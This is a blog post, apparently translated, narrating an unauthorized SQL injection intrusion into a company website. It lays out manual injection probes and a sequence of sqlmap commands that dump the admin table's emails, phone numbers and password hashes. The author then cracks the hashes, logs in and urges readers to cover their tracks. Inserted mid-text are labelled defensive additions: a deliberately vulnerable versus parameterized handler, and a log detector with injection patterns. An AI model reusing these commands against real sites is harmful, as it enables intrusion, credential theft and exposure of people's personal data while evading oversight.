SQL Injection-how do I break through an Internet company step by step

Source: Internet
Author: User


Recently I have been studying Web security, especially SQL injection, and I have been introduced to some of the tools related to it. Bored at home on the weekend, I wanted to combine the things I have learned and, together with a friend, attack a company to see whether I could succeed. You never know until you try. I'm excited, so I wrote this blog post to record how I broke into this internet company step by step.

[About the tools]

(1) AppScan penetration scanning tool

AppScan is one of the most widely used tools for Web application penetration testing. It is a desktop application that helps security professionals perform automated Web application vulnerability assessments.

(2) Sqlmap penetration testing tool

sqlmap is an automated SQL injection tool. Its main function is to scan for, discover and exploit SQL injection vulnerabilities in a given URL.

[Details]

First, use AppScan to scan the official website www.xxx.com. The scan results are as follows:

Among the 56 security issues found, pick out a link of interest, for example the following:

http://www.xxx.com/system/cms/show?id=1

Why pick this one? Because it is a typical SQL injection candidate, the common SQL injection checks below apply to it directly. First, use the following requests to determine whether the site has an injection point:

http://192.168.16.128/news.php?id=1            original page

http://192.168.16.128/news.php?id=1'           error or abnormal display

http://192.168.16.128/news.php?id=1 and 1=1    error or abnormal display

http://192.168.16.128/news.php?id=1 and 1=2    error or abnormal display

If an error occurs, the injection point exists.
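As an added example (not code from the original post or the site it describes), here is the handler behind a page like show?id=1 written the way the article exploits it, string concatenation, beside a parameterized version, with the three manual checks above turned into a regression test a developer can keep. The sqlite table and its rows are constructed for the demo.

```python
import sqlite3

# Constructed stand-in for the CMS table behind "show?id=1"; not the original site's schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cms (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO cms VALUES (?, ?)", [(1, "Welcome"), (2, "News")])
    return conn

def show_vulnerable(conn, raw_id):
    # The request parameter is pasted straight into the SQL text, so "1 and 1=2"
    # or "1'" changes the statement itself: this is the pattern the article exploits.
    sql = "SELECT title FROM cms WHERE id = " + raw_id
    return [row[0] for row in conn.execute(sql)]

def show_hardened(conn, raw_id):
    # Type-check first, then bind the value as a parameter; the SQL text is fixed
    # and the driver passes the integer separately, so no input can alter the query.
    try:
        id_int = int(raw_id)
    except ValueError:
        return []  # a real handler would answer 400 here
    rows = conn.execute("SELECT title FROM cms WHERE id = ?", (id_int,))
    return [row[0] for row in rows]

def probe(handler, conn):
    # The article's three manual checks as a regression test for the handler:
    # does a stray quote raise a database error, and do "and 1=1" / "and 1=2"
    # give different responses (the oracle that boolean-based blind injection needs)?
    try:
        handler(conn, "1'")
        quote_error = False
    except sqlite3.Error:
        quote_error = True
    oracle = handler(conn, "1 and 1=1") != handler(conn, "1 and 1=2")
    return {"quote_error": quote_error, "boolean_oracle": oracle}

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", probe(show_vulnerable, db))   # both True: injectable
    print("parameterized:", probe(show_hardened, db))    # both False
```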

After confirming that the link http://www.xxx.com/system/cms/show?id=1 has an injection point, start the penetration testing tool sqlmap for the next step of the injection. The detailed process is as follows:

1) confirm again whether the target injection point is usable:

python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1"

Parameters:

-u: specifies the URL of the injection point.

Result:

Injection result display:

A. The parameter id is vulnerable to boolean-based blind injection, that is, whether an injected condition is true or false can be determined from the returned page.

B. The parameter id is vulnerable to time-based blind injection, that is, no information can be read from the page content, so a conditional time-delay statement is used and whether it executed is judged from whether the page's response time increased.

C. Database type: MySQL 5.0.12
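Added example, not from the original post: a small detector that reads web server access logs and flags the probe sequence described above (a stray quote, the "and 1=1" / "and 1=2" pair, time-delay functions used by time-based blind payloads) together with sqlmap's default User-Agent, which names the tool unless the operator changes it. The log lines are constructed; the addresses, timestamps and sizes are invented.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format access log; addresses, times and sizes are invented.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:10:00:01 +0000] "GET /system/cms/show?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [12/May/2024:10:00:03 +0000] "GET /system/cms/show?id=1' HTTP/1.1" 500 312 "-" "Mozilla/5.0"
10.0.0.5 - - [12/May/2024:10:00:05 +0000] "GET /system/cms/show?id=1%20and%201%3D1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [12/May/2024:10:00:07 +0000] "GET /system/cms/show?id=1%20and%201%3D2 HTTP/1.1" 200 4010 "-" "Mozilla/5.0"
10.0.0.5 - - [12/May/2024:10:01:00 +0000] "GET /system/cms/show?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.9 - - [12/May/2024:10:02:00 +0000] "GET /system/cms/show?id=2 HTTP/1.1" 200 4900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
                    r' (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Patterns for the manual checks in the article and for time-based blind payloads.
PROBES = [
    ("quote_probe", re.compile(r"^\d+\s*['\"]")),                          # id=1'
    ("boolean_probe", re.compile(r"\b(and|or)\b\s*\d+\s*=\s*\d+", re.I)),  # and 1=1 / and 1=2
    ("time_probe", re.compile(r"\b(sleep|benchmark|waitfor)\b", re.I)),    # delay functions
]

def classify(line):
    """Return (ip, tags) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    tags = []
    if m["ua"].lower().startswith("sqlmap"):
        tags.append("scanner_ua")   # sqlmap's default User-Agent names the tool
    params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    for value in (v for values in params.values() for v in values):
        for name, rx in PROBES:
            if rx.search(value) and name not in tags:
                tags.append(name)
    return m["ip"], tags

def suspicious_sources(log_text, threshold=3):
    """Map source IP -> number of flagged requests, for IPs at or above the threshold."""
    hits = defaultdict(int)
    for line in log_text.splitlines():
        result = classify(line)
        if result and result[1]:
            hits[result[0]] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}
```

The quote/true/false triple from one address within seconds is the manual check from this article; the same address later switching to a delay payload with the sqlmap User-Agent is the tool stage.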

2) dump the names of all databases:

A single command exposes the names of all databases on the database server. The command is as follows:

python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" --dbs

Parameters:

--dbs: lists all databases (note the two leading dashes).

Result:

The result shows that the database server contains three available databases.

3) obtain the database currently in use

python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" --current-db

Parameters:

--current-db: the database currently in use.

Result:

4) obtain the account used by the current database connection

python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" --current-user

5) list all database users

python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" --users

6) obtain the database accounts and password hashes

python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" --passwords

The result shows that the current user probably does not have permission to read the relevant system tables.

7) list the tables in the database

python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" -D xxx_store --tables

Parameters:

-D: specifies the database name.

--tables: lists the tables.

Result:

The result shows that 69 tables are listed.

8) list the fields in a table

python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" -D xxx_store -T mall_admin --columns

Parameters:

-D: specifies the database name.

-T: specifies the table whose fields are listed.

--columns: lists the fields.

Result:

9) dump the contents of the fields

python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" -D xxx_store -T mall_admin -C "ag_id,email,id,mobile,name,password,status" --dump

Parameters:

-C: specifies the fields to dump.

--dump: exports the result.

If the fields contain a lot of data, this takes a long time. You can restrict the export to a specific range of rows. The command is as follows:

python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" -D xxx_store -T mall_admin -C "ag_id,email,id,mobile,name,password,status" --start 1 --stop 10 --dump

Parameters:

--start: specifies the first row.

--stop: specifies the last row.

This command means: export rows 1 to 10 of the fields (ag_id, email, id, mobile, name, password, status) from the table mall_admin in the database xxx_store.

The result is as follows:

We can see the user information in the admin table. The password field holds MD5 hashes, which were reversed to recover the original passwords. With the username and password, we can log on to the website.

So far, we have successfully intruded into the back end of a company and obtained the relevant data. However, we would like to remind you that a successful intrusion is only half the job; the more important half is to clean up after yourself so that nobody can discover you!
